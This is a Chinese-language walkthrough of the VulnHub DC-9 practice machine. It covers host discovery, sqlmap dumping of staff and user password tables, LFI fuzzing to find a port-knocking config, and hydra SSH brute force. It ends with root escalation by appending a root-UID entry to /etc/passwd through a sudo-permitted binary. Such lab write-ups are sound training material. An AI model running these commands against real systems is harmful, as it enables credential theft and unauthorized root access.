本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/dc-9,412/
nmap -n -p- -A 192.168.226.5 -o dc9.nmap
nmap扫描结果
访问web页面
可能存在SQL注入,直接将burpsuite抓包保存为dc9.seq 然后使用sqlmap -r参数跑一下,确认存在SQL注入漏洞,最终跑出数据库的一个admin账号和md5加密的值
sqlmap -r dc9.seq -D Staff -T Users -C UserID,Username,Password --dump-all --batch
解密md5值
登录进去显示用户不存在
这里是要通过fuzz批量测试存在哪些配置文件,而且要猜测是否存LFI漏洞,爆破一段时间,确认存在/etc/knockd.conf
要使用knock进行敲击开启ssh端口
确认成功knock并开启了ssh端口,然后根据上面注入漏洞注入出来的用户名和密码使用hydra进行爆破ssh
sqlmap -r dc9.seq -D users -T UserDetails -C id,password,firstname,lastname,reg_date,username --dump-all --batch
将注入出来的用户名和密码使用awk分割出来用户名username.txt和password.txt通过hydra进行暴力破解
cat userpass.txt | awk -F ',' '{print $4}' > username.txt cat userpass.txt | awk -F ',' '{print $NF}' > password.txt
最终通过hydra破解出来如下:
使用上面的3个用户登录到目标靶机,最终通过用户janitor得到如下敏感信息
将上述得到的密码再次追加到上述破解的密码字典中,再次使用hydra进行暴力破解
确认多出了一个用户fredf,使用su切换过去,执行了下sudo -l发现可以同如下图所示进行提权
根据显示的test文件,执行了file命令确认是二进制可执行文件,执行之后发现是
find / -name "test.py" 2>/dev/null
代码大概意思就是执行了读取了第一个位置的文件,然后将读取的文件内容写入到第二个文件中,可以通过追加passwd文件进行提权
echo 'bmfx:$1$bmfx$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> passwd
切换root用户